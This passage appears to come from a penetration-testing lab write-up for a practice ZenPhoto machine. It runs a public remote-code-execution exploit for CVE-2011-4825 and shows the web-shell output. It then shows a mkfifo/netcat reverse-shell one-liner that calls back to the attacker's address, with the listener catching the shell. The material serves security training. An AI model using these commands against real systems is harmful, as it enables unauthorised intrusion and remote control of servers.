CVE-2011-4825
The target ZenPhoto instance has been identified to be vulnerable to CVE-2011-4825
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/zenphoto]
└─$ php CVE-2011-4825.php $IP /test/
+-----------------------------------------------------------+
| Zenphoto <= 1.4.1.4 Remote Code Execution Exploit by EgiX |
+-----------------------------------------------------------+
zenphoto-shell# whoami
www-data
zenphoto-shell# hostname
offsecsrv
zenphoto-shell# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
link/ether 00:50:56:9e:c7:07 brd ff:ff:ff:ff:ff:ff
inet 192.168.132.41/24 brd 192.168.132.255 scope global eth0
inet6 fe80::250:56ff:fe9e:c707/64 scope link
valid_lft forever preferred_lft foreverInitial Foothold established to the target system as the www-data account via exploiting CVE-2011-4825
zenphoto-shell# rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.45.192 23 >/tmp/f
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/zenphoto]
└─$ nnc 23
listening on [any] 23 ...
connect to [192.168.45.192] from (UNKNOWN) [192.168.132.41] 34181
bash: no job control in this shell
<p-extensions/tiny_mce/plugins/ajaxfilemanager/inc$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
<p-extensions/tiny_mce/plugins/ajaxfilemanager/inc$ Upgraded the shell